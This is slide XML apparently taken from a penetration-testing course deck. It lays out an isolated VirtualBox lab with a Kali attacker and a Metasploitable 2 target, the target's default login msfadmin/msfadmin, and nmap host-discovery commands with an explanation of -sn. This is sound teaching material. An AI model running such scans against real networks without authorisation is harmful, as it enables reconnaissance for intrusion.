          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005840" y="1965960"/>
            <a:ext cx="2834640" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4324"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 0" descr="img/ic_kalilinux.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="2194560"/>
            <a:ext cx="411480" cy="411480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1783080" y="2212848"/>
            <a:ext cx="1920240" cy="320040"/>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Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234440" y="2724912"/>
            <a:ext cx="2468880" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>192.168.56.102</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="2331720"/>
            <a:ext cx="2926080" cy="960120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 47619"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1B1033"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="2450592"/>
            <a:ext cx="2926080" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>vboxnet0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>host-only  /24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1250" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3840480" y="2807208"/>
            <a:ext cx="731520" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7589520" y="2807208"/>
            <a:ext cx="731520" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="701DF5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8366760" y="1965960"/>
            <a:ext cx="2834640" cy="1691640"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4324"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="FF6B6B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8595360" y="2212848"/>
            <a:ext cx="2468880" cy="320040"/>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Metasploitable 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8595360" y="2606040"/>
            <a:ext cx="2560320" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>target</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>192.168.56.101</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>msfadmin / msfadmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4343400"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>FIND YOUR TARGET</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="4681728"/>
            <a:ext cx="5486400" cy="992124"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5530"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694944" y="4818888"/>
            <a:ext cx="5193792" cy="717804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ ip a                    # your own address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ ip route                # your subnet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1740"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>$ sudo nmap -sn 192.168.56.0/24</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4343400"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>GROUND RULES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4681728"/>
            <a:ext cx="5212080" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Host-only means the VM cannot reach the internet, and the internet cannot reach it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Metasploitable has no firewall and no updates. That is the point</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B0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4297680" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="12082A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2011680"/>
            <a:ext cx="3291840" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="2788920"/>
            <a:ext cx="6675120" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Discovery and scanning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983480" y="3657600"/>
            <a:ext cx="6583680" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Who is alive, which doors are open,</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>and what nmap is really asking.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>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02 / SCANNING</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Step one: which hosts are alive</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12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1188720"/>
            <a:ext cx="11064240" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>-sn: s for scan type, n for no port scan. Find the live hosts and stop there</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1150" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Image 0" descr="img/t_discovery.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1600200"/>
            <a:ext cx="6446520" cy="3246120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="1691640"/>
            <a:ext cx="4114800" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT -sn DOES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="2057400"/>
            <a:ext cx="4315968" cy="2926080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1823"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1250" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
